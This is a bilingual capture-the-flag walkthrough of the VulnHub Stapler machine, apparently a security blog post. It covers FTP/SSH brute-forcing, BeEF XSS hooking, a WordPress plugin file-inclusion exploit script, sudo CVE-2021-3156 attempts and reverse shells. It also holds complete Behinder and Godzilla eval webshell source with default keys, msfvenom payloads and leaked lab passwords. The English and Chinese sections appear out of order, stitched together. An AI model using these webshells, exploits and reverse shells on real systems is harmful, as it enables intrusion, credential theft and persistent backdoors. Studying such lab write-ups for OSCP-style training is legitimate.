The /admin112233/ page on port 12380 contains a pre-planted stored XSS payload — intentionally placed by the machine author as an Easter egg.

What happened:

The page contains JS code that redirects to http://www.xss-payloads.com/, triggering the antivirus Trojan/HTML.Redirector.bz alert
The popup This could of been a BeEF-XSS hook ;) is a hint from the author — meaning “a BeEF-XSS hook could have been placed here”

Author’s intention — BeEF attack path:

In a real-world scenario, an attacker could:

1. Inject BeEF hook.js into this page
2. Administrator's browser gets hooked when visiting the page
3. Control the administrator's browser via BeEF
4. Perform keylogging, screenshots, internal network reconnaissance, etc.

Scenario assumption: You only know https://192.168.201.148:12380 and just discovered XSS on this page.

Step 1: Confirm XSS existence

Visiting https://192.168.201.148:12380/admin112233/ triggers a popup — confirming stored XSS with the payload already in the page.

Step 2: Start BeEF

1# Start BeEF on Kali
2cd /usr/share/beef-xss
3./beef
4
5# Or
6beef-xss

After starting, access the BeEF control panel:

http://127.0.0.1:3000/ui/panel
# Default credentials: beef:beef

Visit local test page first http://127.0.0.1:3000/demos/basic.html to see if a zombie comes online:

Step 3: Construct hook URL

BeEF hook script address:

http://172.168.169.128:3000/hook.js

Step 4: Inject the hook into the target page

This is the key step — several methods:

Method 1 — If the page has an input box, inject directly:

1<script src="http://192.168.45.187:3000/hook.js"></script>

With God Mode perspective using SHayslett’s account to check admin112233’s homepage — it’s owned by root and can’t be modified. Abandoned.

Method 2 — Exploit WordPress (blog on 12380):

1. Log in to WordPress backend with cracked credentials
2. Inject hook.js in posts/comments/widgets
3. Wait for administrator to visit

Comment awaiting moderator review.

Method 3 — The /admin112233/ page already has XSS, so there might be input points. Scan for them:

1# nikto scan on 12380
2nikto -h https://192.168.201.148:12380 -ssl
3
4# or gobuster directory scan
5gobuster dir -u https://192.168.201.148:12380 -w /usr/share/wordlists/dirb/common.txt -k

Step 5: BeEF control after victim triggers

Here I’m pretending to be John (password cracked from the blog system hash cracking section) — first in the list, likely the admin — to simulate a victim clicking the XSS:

Seemed useless. So I directly modified admin112233’s index.html to verify.

Modify index.html to inject BeEF hook

 1# Using root account here just for verification and simulation
 2# In a real engagement, check if you have write permissions
 3cat > /var/www/https/admin112233/index.html << 'EOF'
 4<html>
 5<head>
 6<title>mwwhahahah</title>
 7<body>
 8<noscript>Give yourself a cookie! Javascript didn't run =)</noscript>
 9<script type="text/javascript">
10window.alert("This could of been a BeEF-XSS hook ;)");
11</script>
12<script src="http://192.168.45.187:3000/hook.js"></script>
13</body>
14</html>
15EOF

Simulate victim access (in Kali browser) at https://192.168.201.148:12380/admin112233/ — ignore the certificate warning and proceed. BeEF control panel should show an online zombie. Note the page is https but hook.js is http — the browser may block due to mixed content. Click to allow insecure content in the browser address bar, or convert the hook to https.

If still not working, modify browser settings (simulating a victim’s unsafe browser configuration):

# Type in Firefox address bar
about:config 
# Search for 
security.mixed_content.block_active_content 
# Set to false

Once a browser visits a page containing hook.js, the BeEF control panel shows an online zombie. Available commands include:

Commands panel can execute:
├── Get Cookie (check if HttpOnly prevents theft)
├── Keylogging
├── Screenshots
├── Internal network recon (scan internal hosts)
├── Get browser info, saved passwords
├── Social engineering popups (fake login forms for credential theft)
└── Redirect to phishing pages

Actual value on this machine:

XSS → Steal admin Cookie
 → Forge admin login to WordPress backend
 → Upload malicious plugin/theme → webshell
 → Escalate from www-data

This is a complete XSS → RCE chain requiring no initial credentials.

Since this is a lab environment, both attacker and victim roles were played by me.

Finding Which Fool Logged in with Plaintext SSH

1grep -r "sshpass" /home/*/.bash_history 2>/dev/null

The output shows the file path, e.g. /home/someuser/.bash_history:sshpass -p .... The username in the path is the leaker.

More comprehensive search:

1grep -r "sshpass\|password\|passwd" /home/*/.bash_history 2>/dev/null

It was you, JKanode! lmao. Beyond .bash_history, you can also check:

 1# Recent login records
 2last JKanode
 3
 4# Failed login records
 5lastb JKanode 2>/dev/null
 6
 7# Last login time
 8lastlog | grep JKanode
 9
10# Current/recent terminal activity
11who
12w
13
14# Process history (if audited)
15cat /var/log/auth.log | grep JKanode

The .bash_history already reveals this user’s problem — typing passwords in plaintext on the command line (sshpass -p). In a real environment, this is a serious operational security failure: passwords are permanently saved in the history file, and during ps aux execution other users can also see the plaintext password in the process arguments.

After privilege escalation, the following was also discovered:

From ps aux, several interesting findings:

1. Root is running nc listening on port 666

root 1515 nc -nlvp 666

Connecting directly might give a root shell:

1nc 127.0.0.1 666

2. Root is running two suspicious scripts

root 1501 /bin/bash /root/python.sh
root 1503 /bin/bash /usr/local/src/nc.sh

If these scripts can be read/written, privilege escalation is possible. Check permissions:

1ls -al /usr/local/src/nc.sh
2cat /usr/local/src/nc.sh

Port 666 was also checked — just a useless image.

3. JKanode has never logged in (Never logged in)

But their home directory is running SimpleHTTPServer 8888, meaning root started it as JKanode — this account is a “service account”. The password in history was left by someone else’s operations.

4. Overview of open services

:80 — php -S (www user)
:8888 — python SimpleHTTPServer (JKanode)
:666 — nc listening as root ← most suspicious
sshd/vsftpd/smbd/mysql — standard services

Port 666 should be investigated first.

Port 666 Discovery

For unknown service ports, use nc for probing:

1nc 172.168.169.129 666

Output is garbled, but the text message2.jpg is clearly visible.

nc 192.168.179.149 666 > message_666
file message_666 // discovered to be a zip archive
unzip message_666
view message2.jpg

Nothing useful — just a new user appearing in the image. But later, LinPEAS analysis revealed it can be combined with the cron job. See Port 666 Rabbit Hole Becomes a Real Hole

SMB Open Shares

smbclient -N //172.168.169.129/tmp
smbclient -N //172.168.169.129/tmp

Easter Egg New Users

Discovered new user Barry.

Found another new person Abby — not previously seen among SSH and FTP usernames.

Another new person, also from the title: Tim.

Accidentally got hit by a cringe love song — lol.

Hello Dolly is a default Easter egg plugin bundled with WordPress, personally written by Matt Mullenweg (WordPress founder). Every time you enter the admin backend, it randomly displays a lyric from the song in the top right corner.

And it’s actually there…

Akismet Plugin XSS Vulnerability

Both vulnerabilities are stored XSS, but have limited practical value. Analysis:

37902.php — legacy.php XSS

1# Run directly — targeting WordPress comment injection
2php 37902.php 172.168.169.131:12380/blogblog

The principle is to POST an XSS payload to /wp-content/plugins/akismet/legacy.php — the payload is stored in comments and triggers when the admin reviews them.

30036.html — Admin config page XSS

This requires admin privileges to access /wp-admin/plugins.php. Open the HTML file directly in a browser and submit the form to trigger the backend XSS.

Reality check:

1# First confirm if legacy.php exists
2curl -k https://172.168.169.131:12380/blogblog/wp-content/plugins/akismet/legacy.php

The plugin directory returns 403 — legacy.php likely doesn’t exist in newer versions. This vulnerability is essentially unusable.

Why it’s irrelevant to this machine:

You already have root. The ultimate goal of these XSS vulnerabilities is merely to steal admin cookies and log into the backend — far less direct than the advanced-video-embed plugin (arbitrary file read) which can directly read wp-config.php for the database password.

Continuing with the 39646.py path is more valuable.

shortcode-ui and two-factor Plugins Have No Applicable Vulnerabilities

No matching exploitable vulnerabilities found.

CVE-2021-3156 Privilege Escalation Failed

From LinPEAS results fed to AI for analysis — malloc(): memory corruption + core dump = vulnerability exists and can be exploited:

1# Download PoC
2wget https://codeload.github.com/worawit/CVE-2021-3156/zip/main -O baron.zip
3unzip baron.zip
4cd CVE-2021-3156-main
5# This machine is i386 architecture — choose the corresponding version
6python3 exploit_nss.py

glibc version too old (Ubuntu 16.04 uses 2.23). This PoC doesn’t apply. Try a version that doesn’t depend on tcache:

1# Try blasty's version
2wget https://codeload.github.com/blasty/CVE-2021-3156/zip/main -O blasty.zip
3unzip blasty.zip
4cd CVE-2021-3156-main
5make

When running, specify the target system:

1./sudo-hax-me-a-sandwich
2# Lists supported targets — find the Ubuntu 16.04 entry number
3./sudo-hax-me-a-sandwich 0 # Replace 0 with the correct number

No matching preset target. Ubuntu 16.04 + sudo 1.8.16 is not in the list. Manual mode requires precise offset calculation — quite cumbersome.

Abandoning this path entirely. CVE-2021-3156 is actually not viable on this machine because:

glibc 2.23 is too old — tcache version doesn’t work
blasty’s version has no preset offsets for Ubuntu 16.04
Manual offset calculation requires a local debugging environment

Common WebShell Techniques

1. Reverse Shell (already used)

1cp /usr/share/webshells/php/php-reverse-shell.php .
2sed -i -E "s/ip\s*=\s*'127\.0\.0\.1'\s*;/ip = '172.168.169.128';/g; s/port\s*=\s*1234\s*;/port = 4777;/g" php-reverse-shell.php

2. Webacoo

1# Install
2apt install webacoo -y
3
4# Generate encrypted webshell
5webacoo -g -o shell.php
6
7# Connect
8webacoo -t -u https://172.168.169.131:12380/blogblog/wp-content/uploads/shell.php

Feature: traffic is base64-encoded, bypasses simple WAFs.

3. Weevely

1# Generate
2weevely generate hacker123 shell.php
3
4# Connect
5weevely https://172.168.169.131:12380/blogblog/wp-content/uploads/shell.php hacker123

Feature: traffic obfuscation, powerful — built-in file manager/port scanner/privilege escalation suggestions.

4. MSF Generation

 1# Generate meterpreter reverse shell
 2msfvenom -p php/meterpreter/reverse_tcp \
 3 LHOST=172.168.169.128 LPORT=4444 \
 4 -f raw > shell.php
 5
 6# MSF listener
 7msfconsole -q -x "use multi/handler; \
 8 set payload php/meterpreter/reverse_tcp; \
 9 set LHOST 172.168.169.128; \
10 set LPORT 4444; run"

Feature: obtains meterpreter session — the most powerful, directly compatible with subsequent privilege escalation modules.

5. Behinder (冰蝎)

 1# Fixed PHP shell template for Behinder
 2cat > shell.php << 'EOF'
 3<?php
 4@error_reporting(0);
 5session_start();
 6$key="e45e329feb5d925b";
 7$_SESSION['k']=$key;
 8session_write_close();
 9$post=file_get_contents("php://input");
10if(!extension_loaded('openssl')){
11 $t="base64_decode";
12 $post=$t($post."");
13 for($i=0;$i<strlen($post);$i++){
14 $post[$i]=$post[$i]^$key[$i+1&15];
15 }
16}else{
17 $post=openssl_decrypt($post,"AES128",$key);
18}
19$arr=explode('|',$post);
20$func=$arr[0];
21$params=$arr[1];
22class C{public function __construct($p){eval($p);}}
23@new C($params);
24?>
25EOF

Connect using the Behinder client. Default key: e45e329feb5d925b. Traffic is AES encrypted — best WAF bypass capability.

6. Godzilla (哥斯拉)

 1cat > shell.php << 'EOF'
 2<?php
 3@session_start();
 4@set_time_limit(0);
 5@error_reporting(0);
 6function encode($D,$K){
 7 for($i=0;$i<strlen($D);$i++){
 8 $c=$K[$i+1&15];
 9 $D[$i]=$D[$i]^$c;
10 }
11 return $D;
12}
13$pass='pass';
14$payloadName='payload';
15$key='3c6e0b8a9c15224a';
16if(isset($_POST[$pass])){
17 $data=encode(base64_decode($_POST[$pass]),$key);
18 if(isset($_SESSION[$payloadName])){
19 $payload=encode($_SESSION[$payloadName],$key);
20 eval($payload);
21 echo substr(md5($pass.$key),0,16);
22 echo base64_encode(encode(@run($data),$key));
23 echo substr(md5($pass.$key),16);
24 }else{
25 if(stripos($data,"getBasicsInfo")!==false){
26 $_SESSION[$payloadName]=encode($data,$key);
27 }
28 }
29}
30EOF

Tool Comparison:

Tool	Traffic Characteristics	Capability	Best Use Case
Reverse Shell	Plaintext	Basic	Quick shell access
Weevely	Obfuscated	Medium	WAF environments
Webacoo	base64	Medium	Simple bypass
MSF	Encryptable	Strongest	Subsequent privilege escalation needed
Behinder	AES encrypted	Strong	Enterprise WAF environments
Godzilla	XOR encrypted	Strong	Commonly used on Chinese practice ranges

Pitfalls

Nmap Network Fluctuation Missed Ports

The /var/www/http website directory clearly contains webpage files:

But no matter how many times the website was refreshed, nothing appeared. Appending directories also didn’t help — suspected nmap missed some ports.

Rescanning revealed new ports — port 12380 turned out to be the web server:

Viewing the page source confirmed that port 12380 corresponds to the /var/www/http website directory:

Summary

Attack Path Diagram

flowchart TD
 %% Asset list
 A[Kali attacker]
 B[Target machine]
 C[Port 21: FTP username leak]
 
 D[elly FTP account]
 E[Port 22: SHayslett SSH account]
 F[peter high-privilege account]
 G[root]
 H[Port 139: SMB service]
 I[Port 3306: MySQL / Port 12380: phpMyAdmin]
 K[Port 12380: Blog system]
 L[Cron job]
 M[Port 666: nc service]

 
 %% Path relationships
 A-->|scan|B
 B-->|FTP anonymous login|C
 C-->|hydra brute-force|D
 D-->|passwd leak via FTP hydra brute-force|E
 E-->|bash_history password leak|F
 F-->|sudo -s direct escalation|G
 B-->H-->|SMB enum username leak hydra brute-force|E
 E-->|www config reveals DB password|I
 I-->|DB password john crack|K
 E-->|CVE-2016-4557 kernel exploit|G
 E-->|CVE-2021-4034 kernel exploit|G
 E-->L-->|logrotate write permission|G
 B-->I
 B-->K
 

 K -->|advanced-video LFI get wp-config no login required|I
 K -->|advanced-video LFI get passwd no login required| E
 K -->|WP admin upload reverse shell|F
 I-->|mysql outfile webshell|E
 E-->|linpeas reveals nc service logic|M
 L-->|logrotate rewrites nc service logic|M-->G
 
	%% Line styles: --- (solid), -.-> (dashed), ==> (thick arrow)
	%% -->|condition|: connection with condition text
	%% Rectangle node[ ], diamond decision node{ }, rounded node()
 %% Style definitions
 classDef attack fill:#ffcccc,stroke:#ff0000,stroke-width:2px;
 classDef public fill:#ffeecc,stroke:#ff9900,stroke-width:2px; 
 classDef internal fill:#ccffcc,stroke:#009900,stroke-width:2px; 
 %% Line style and color scheme (light/dark mode compatible)
	linkStyle default stroke:#666666,stroke-width:2px,stroke-dasharray:0; 

 %% Apply styles
	 A
attack
	 B
public
	 C
public
	 K
public
	 H
public
	 D
public
	 E
internal
	 F
internal
	 G
internal
	 I
public
	 L
internal
	 M
public

Attack Timeline

gantt
 title Attack Timeline
 dateFormat YYYY-MM-DD HH:mm
 axisFormat %m/%d %H:%M
 
 section Reconnaissance Phase
 Target scanning :a1, 2026-03-14 11:11, 2026-03-14 11:30
 Vulnerability identification :a2, after a1, 2026-03-14 14:37

 
 section Attack Phase
 Initial access :crit, b1, after a2, 2026-03-14 15:09
 Privilege escalation :milestone, b2, after b1, 2026-03-14 15:13

After speed-running the machine on the 14th, I spent the following days reviewing it in depth — the more you dig into this machine, the more there is to find. Kept going all the way until 13:47 on the 16th.

🔔 Want more cybersecurity and programming content?

Follow the LongYuSec-Jing’an public account. We explore cutting-edge technology together and share practical learning resources and tools. We focus on in-depth analysis — no fluff, only the most practical technical content! 💻

Join us now and grow together! 🌟

👉 Long-press or scan the QR code to follow

Reply with keywords from the article to get more technical materials and book recommendations! 📚

Recommended Reading

OSCP官方靶场-Stapler-WP

Sat, 14 Mar 2026 11:11:29 +0800

关注泷羽Sec和泷羽Sec-静安公众号，这里会定期更新与 OSCP、渗透测试等相关的最新文章，帮助你理解网络安全领域的最新动态。后台回复“OSCP配套工具”获取本文的工具

官网打开靶场或链接地址下载虚拟镜像：

https://www.vulnhub.com/entry/stapler-1,150/

信息收集

1# Kali攻击机地址
2192.168.45.165
3# 靶机地址
4192.168.198.148

扫描端口和目录

 1# 设置MTU
 2sudo ip link set dev tun0 mtu 1250
 3ip link show tun0
 4# 扫描端口
 5ports=$(sudo nmap -p- --min-rate=5000 -Pn 192.168.198.148 | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
 6echo $ports
 7# 扫描服务
 8sudo nmap -sT -sC -sV -O -Pn -p$ports 192.168.198.148
 9sudo nmap --script=vuln -p$ports -Pn 192.168.198.148
10# 扫描目录
11dirsearch -u http://192.168.223.148
12gobuster dir -e -u http://192.168.198.148 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 20 -x php,html,txt -b 403,500,404 -z
13whatweb http://192.168.198.148/

扫描结果如下：

 1┌──(kali㉿kali)-[~/Desktop]
 2└─$ echo $ports
 321,22,80,139,3306
 4
 5┌──(kali㉿kali)-[~/Desktop]
 6└─$ sudo nmap -sT -sC -sV -O -Pn -p$ports 192.168.198.148
 7Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-13 23:17 -0400
 8Nmap scan report for 192.168.198.148
 9Host is up (0.67s latency).
 10
 11PORT STATE SERVICE VERSION
 1221/tcp open ftp vsftpd 2.0.8 or later
 13| ftp-anon: Anonymous FTP login allowed (FTP code 230)
 14|_Can't get directory listing: PASV failed: 550 Permission denied.'
 15| ftp-syst:
 16| STAT:
 17| FTP server status:
 18| Connected to 192.168.45.165
 19| Logged in as ftp
 20| TYPE: ASCII
 21| No session bandwidth limit
 22| Session timeout in seconds is 300
 23| Control connection is plain text
 24| Data connections will be plain text
 25| At session startup, client count was 4
 26| vsFTPd 3.0.3 - secure, fast, stable
 27|_End of status
 2822/tcp open ssh OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
 29| ssh-hostkey:
 30| 2048 81:21:ce:a1:1a:05:b1:69:4f:4d:ed:80:28:e8:99:05 (RSA)
 31| 256 5b:a5:bb:67:91:1a:51:c2:d3:21:da:c0:ca:f0:db:9e (ECDSA)
 32|_ 256 6d:01:b7:73:ac:b0:93:6f:fa:b9:89:e6:ae:3c:ab:d3 (ED25519)
 3380/tcp open http PHP cli server 5.5 or later
 34|_http-title: 404 Not Found
 35139/tcp open netbios-ssn Samba smbd 4.3.9-Ubuntu (workgroup: WORKGROUP)
 363306/tcp open mysql MySQL 5.7.12-0ubuntu1
 37| mysql-info:
 38| Protocol: 10
 39| Version: 5.7.12-0ubuntu1
 40| Thread ID: 8
 41| Capabilities flags: 63487
 42| Some Capabilities: Support41Auth, ODBCClient, Speaks41ProtocolOld, LongColumnFlag, SupportsTransactions, IgnoreSigpipes, IgnoreSpaceBeforeParenthesis, InteractiveClient, SupportsLoadDataLocal, Speaks41ProtocolNew, ConnectWithDatabase, SupportsCompression, LongPassword, DontAllowDatabaseTableColumn, FoundRows, SupportsMultipleResults, SupportsMultipleStatments, SupportsAuthPlugins
 43| Status: Autocommit
 44| Salt: w3/ \x07\x1D7\x03o?)\x1C\x01(\x05`\x1CJ*\x04
 45|_ Auth Plugin Name: mysql_native_password
 46Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
 47Aggressive OS guesses: Linux 3.10 - 4.11 (97%), Linux 3.2 - 4.14 (97%), Linux 3.13 - 4.4 (93%), Linux 3.8 - 3.16 (93%), Linux 2.6.32 - 3.13 (93%), Linux 3.4 - 3.10 (93%), Linux 4.15 (93%), Linux 5.0 - 5.14 (93%), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3) (93%), Linux 4.15 - 5.19 (93%)
 48No exact OS matches for host (test conditions non-ideal).
 49Network Distance: 4 hops
 50Service Info: Host: RED; OS: Linux; CPE: cpe:/o:linux:linux_kernel
 51
 52Host script results:
 53|_nbstat: NetBIOS name: RED, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
 54| smb-security-mode:
 55| account_used: guest
 56| authentication_level: user
 57| challenge_response: supported
 58|_ message_signing: disabled (dangerous, but default)
 59| smb-os-discovery:
 60| OS: Windows 6.1 (Samba 4.3.9-Ubuntu)
 61| Computer name: red
 62| NetBIOS computer name: RED\x00
 63| Domain name: \x00
 64| FQDN: red
 65|_ System time: 2026-03-14T03:18:42+00:00
 66| smb2-security-mode:
 67| 3.1.1:
 68|_ Message signing enabled but not required
 69|_clock-skew: mean: 0s, deviation: 2s, median: -1s
 70| smb2-time:
 71| date: 2026-03-14T03:18:39
 72|_ start_date: N/A
 73
 74OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
 75Nmap done: 1 IP address (1 host up) scanned in 150.85 seconds
 76
 77┌──(kali㉿kali)-[~/Desktop]
 78└─$ sudo nmap --script=vuln -p$ports -Pn 192.168.198.148
 79Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-13 23:20 -0400
 80Nmap scan report for 192.168.198.148
 81Host is up (0.47s latency).
 82
 83PORT STATE SERVICE
 8421/tcp open ftp
 8522/tcp open ssh
 8680/tcp open http
 87| http-slowloris-check:
 88| VULNERABLE:
 89| Slowloris DOS attack
 90| State: LIKELY VULNERABLE
 91| IDs: CVE:CVE-2007-6750
 92| Slowloris tries to keep many connections to the target web server open and hold
 93| them open as long as possible. It accomplishes this by opening connections to
 94| the target web server and sending a partial request. By doing so, it starves
 95| the http server's resources causing Denial Of Service.'
 96|
 97| Disclosure date: 2009-09-17
 98| References:
 99| http://ha.ckers.org/slowloris/
100|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
101|_http-csrf: Couldn't find any CSRF vulnerabilities.'
102|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.'
103|_http-dombased-xss: Couldn't find any DOM based XSS.'
104|_http-vuln-cve2014-3704: ERROR: Script execution failed (use -d to debug)
105139/tcp open netbios-ssn
1063306/tcp open mysql
107
108Host script results:
109|_smb-vuln-ms10-054: false
110| smb-vuln-cve2009-3103:
111| VULNERABLE:
112| SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497)
113| State: VULNERABLE
114| IDs: CVE:CVE-2009-3103
115| Array index error in the SMBv2 protocol implementation in srv2.sys in Microsoft Windows Vista Gold, SP1, and SP2,
116| Windows Server 2008 Gold and SP2, and Windows 7 RC allows remote attackers to execute arbitrary code or cause a
117| denial of service (system crash) via an & (ampersand) character in a Process ID High header field in a NEGOTIATE
118| PROTOCOL REQUEST packet, which triggers an attempted dereference of an out-of-bounds memory location,
119| aka "SMBv2 Negotiation Vulnerability."
120|
121| Disclosure date: 2009-09-08
122| References:
123| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
124|_ http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
125| smb-vuln-regsvc-dos:
126| VULNERABLE:
127| Service regsvc in Microsoft Windows systems vulnerable to denial of service
128| State: VULNERABLE
129| The service regsvc in Microsoft Windows 2000 systems is vulnerable to denial of service caused by a null deference
130| pointer. This script will crash the service if it is vulnerable. This vulnerability was discovered by Ron Bowes
131| while working on smb-enum-sessions.
132|_
133|_smb-vuln-ms10-061: false
134
135Nmap done: 1 IP address (1 host up) scanned in 524.65 seconds
136
137Target: http://172.168.169.129/
138
139[02:06:11] Starting:
140[02:06:11] 200 - 4KB - /.bashrc
141[02:06:11] 200 - 220B - /.bash_logout
142[02:06:12] 200 - 675B - /.profile
143
144Task Completed

80端口网页打开什么都没有

FTP 匿名登陆

Nmap扫描提示有FTP匿名登录，登录后有个note文件，下载后查看就是一句话。如下图

得到疑似是管理员的3个用户名，写入 user.txt 文件

John
Elly
Harry

中间因为网络延迟问题，超时了，我是免费账户，每天只有3小时免费额度，没事咱有vulnhub！vulnhub万岁！

https://ciphersaw.me/2021/07/10/exploration-of-file-format-exception-while-vmware-loads-ovf/

参考先知社区的文章，解决导入VMWare报错问题。现在靶机地址变为172.168.169.129

继续爆破FTP，三个用户名呢，总有一个大冤种。

FTP登录用户名爆破

推荐工具：username-anarchy

专门针对人名生成各种变体，是渗透测试中最常用的用户名字典生成器。

# 安装 
git clone https://github.com/urbanadventurer/username-anarchy.git
# 挂代理
git clone https://gh-proxy.org/https://github.com/urbanadventurer/username-anarchy.git
cd username-anarchy
./username-anarchy John

针对这三个用户名

 1# 逐个生成并合并
 2./username-anarchy John > usernames.txt
 3./username-anarchy Elly >> usernames.txt
 4./username-anarchy Harry >> usernames.txt
 5# 批量的
 6./username-anarchy -i ../user.txt >> ../usernames.txt
 7# 去重
 8sort -u usernames.txt -o usernames.txt
 9
10wc -l usernames.txt

或者如果名字有姓（比如从网站上找到全名），效果更好：

1./username-anarchy "John Smith" >> usernames.txt

生成的用户名之后使用hydra爆破

hydra -L usernames.txt -e nsr ftp://172.168.169.129

这里的nsr 参数表述尝试空密码，同用户名密码，反用户名密码。

得到正确的可登录的用户名和密码

FTP文件夹下有/etc/passwd 泄露

SSH 登录爆破

passwd文件里面有很多用户，筛选一下可以登录的用户名，然后使用hydra爆破

1cat passwd | grep -v -E "nologin|false" | cut -d ":" -f 1 > ssh_user_name
2hydra -L ssh_user_name -e nsr ssh://172.168.169.129

冤种2号！打到这里非常快乐。

History历史记录泄露

登上之后直接开始一顿快乐的搜索

1ls /home/*/ -al
2cat /home/*/.* |grep pass
3cat /home/*/.bash_history | grep -v exit

又发现两个幸运观众的密码泄露，所以真的不要把密码明文打在命令行里

1sshpass -p thisimypassword ssh JKanode@localhost
2sshpass -p JZQuyIN5 peter@localhost

登录JKanode 没什么用，炮灰一个

登录Peter账户直接提权

这个靶机还有多种方式，这是速通的一种方法，这么快速可能会让你觉得这个靶机不过如此。但是官网也说了，至少两种方式获得shell和至少3中方式提权root。所以，盘他，填满它所有的洞！

其他的方法

主要参考

https://xz.aliyun.com/news/12473 https://www.freebuf.com/vuls/343731.html https://blog.csdn.net/2403_88668158/article/details/146487087

进shell的方法

12380网页

这里http不管怎么看都是没用的，要https

扫描网站目录发现可用信息

phpMyadmin 数据库管理后台

phpmyadmin界面对于已经[[#SSH 登录爆破]]拿到了登录密码的人来说用户不大，如果你本地没有Dbeaver之类的软件，也懒得用mysql命令的话可以用用。

blogblog博客系统

终于到主菜了，博客系统。打开页面就看到登录窗口和Wordpress的提示，上工具！

先枚举用户：

1wpscan --url https://172.168.169.131:12380/blogblog/ -e u --disable-tls-checks

这里可以尝试一开始的[[#FTP登录用户名爆破]]登录进去的elly，但是很明显进去之后这个页面显示她不是管理员，只是普通用户。这里的密码可以用之前mysql爆破[[#获得blog博客系统的用户密码]]出来的，假如没有走通mysql的路子的话也不怕，还有洞。

扫描网站使用的插件：

1wpscan --url https://172.168.169.131:12380/blogblog/ -e ap --disable-tls-checks --plugins-detection aggressive

发现注册地址，上传目录。假如之后要穿shell应该能传到这个路径下面。

插件的扫描结果如下，来一个一个盘

 1[i] Plugin(s) Identified:
 2
 3[+] advanced-video-embed-embed-videos-or-playlists
 4 | Location: https://172.168.169.131:12380/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/
 5 | Latest Version: 1.0 (up to date)
 6 | Last Updated: 2015-10-14T13:52:00.000Z
 7 | Readme: https://172.168.169.131:12380/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/readme.txt
 8 | [!] Directory listing is enabled
 9 |
10 | Found By: Known Locations (Aggressive Detection)
11 | - https://172.168.169.131:12380/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/, status: 200
12 |
13 | Version: 1.0 (80% confidence)
14 | Found By: Readme - Stable Tag (Aggressive Detection)
15 | - https://172.168.169.131:12380/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/readme.txt
16
17[+] akismet
18 | Location: https://172.168.169.131:12380/blogblog/wp-content/plugins/akismet/
19 | Latest Version: 5.6
20 | Last Updated: 2025-11-12T16:31:00.000Z
21 |
22 | Found By: Known Locations (Aggressive Detection)
23 | - https://172.168.169.131:12380/blogblog/wp-content/plugins/akismet/, status: 403
24 |
25 | The version could not be determined.
26
27[+] shortcode-ui
28 | Location: https://172.168.169.131:12380/blogblog/wp-content/plugins/shortcode-ui/
29 | Last Updated: 2019-01-16T22:56:00.000Z
30 | Readme: https://172.168.169.131:12380/blogblog/wp-content/plugins/shortcode-ui/readme.txt
31 | [!] The version is out of date, the latest version is 0.7.4
32 | [!] Directory listing is enabled
33 |
34 | Found By: Known Locations (Aggressive Detection)
35 | - https://172.168.169.131:12380/blogblog/wp-content/plugins/shortcode-ui/, status: 200
36 |
37 | Version: 0.6.2 (100% confidence)
38 | Found By: Readme - Stable Tag (Aggressive Detection)
39 | - https://172.168.169.131:12380/blogblog/wp-content/plugins/shortcode-ui/readme.txt
40 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
41 | - https://172.168.169.131:12380/blogblog/wp-content/plugins/shortcode-ui/readme.txt
42
43[+] two-factor
44 | Location: https://172.168.169.131:12380/blogblog/wp-content/plugins/two-factor/
45 | Latest Version: 0.15.0
46 | Last Updated: 2026-02-17T13:21:00.000Z
47 | Readme: https://172.168.169.131:12380/blogblog/wp-content/plugins/two-factor/readme.txt
48 | [!] Directory listing is enabled
49 |
50 | Found By: Known Locations (Aggressive Detection)
51 | - https://172.168.169.131:12380/blogblog/wp-content/plugins/two-factor/, status: 200
52 |
53 | The version could not be determined.

advanced-video插件

搜锁之后发现一个文件包含的漏洞

下载后添加对SSL的支持，和改成python3的语法

 1#!/usr/bin/env python3
 2import random
 3import urllib.request
 4import urllib.error
 5import re
 6import ssl
 7
 8# 忽略 SSL 证书校验
 9ssl._create_default_https_context = ssl._create_unverified_context
10
11url = "https://172.168.169.131:12380/blogblog" # 改成你的靶机 IP
12
13randomID = int(random.random() * 100000000000000000)
14
15objHtml = urllib.request.urlopen(
16 url + '/wp-admin/admin-ajax.php?action=ave_publishPost&title=' + 
17 str(randomID) + '&short=rnd&term=rnd&thumb=../wp-config.php'
18)
19content = objHtml.readlines()
20
21for line in content:
22 line = line.decode('utf-8')
23 numbers = re.findall(r'\d+', line)
24 id = numbers[-1]
25 id = int(id) // 10 # Python3 整除用 //
26
27objHtml = urllib.request.urlopen(url + '/?p=' + str(id))
28content = objHtml.readlines()
29
30for line in content:
31 line = line.decode('utf-8')
32 if 'attachment-post-thumbnail size-post-thumbnail wp-post-image' in line:
33 urls = re.findall('"(https?://.*?)"', line)
34 print(urllib.request.urlopen(urls[0]).read().decode('utf-8'))

1wget https://172.168.169.131:12380/blogblog/wp-content/uploads/349164566.jpeg --no-check-certificate

这配置文件不就搞到手了，嘿嘿嘿，数据库密码到手，形成闭环。

同理还可以把 /etc.passwd 文件也弄下来，这就回到了[[#SSH 登录爆破]]，又一个闭环。

John管理员登录WP后台上传反弹shell

管理员打开media媒体界面，发现就有之前插件生成的文件，

复制一个反弹php过来，修改

1 cp /usr/share/webshells/php/php-reverse-shell.php .
2 sed -i -E "s/ip\s*=\s*'127\.0\.0\.1'\s*;/ip = '172.168.169.128';/g; s/port\s*=\s*1234\s*;/port = 4777;/g" php-reverse-shell.php

生成shell有很多方法，这里只用了反弹的类型，其他WP提到了webacoo，weevely，MSF，冰蝎生成等。可以看[[#WebShell 的常用姿势]]

点击上传，提示文件类型不支持

抓包，改00截断，成功上传，但是没有成功运行，还是当作png解析的。问题不大，还有插件上传这个点。

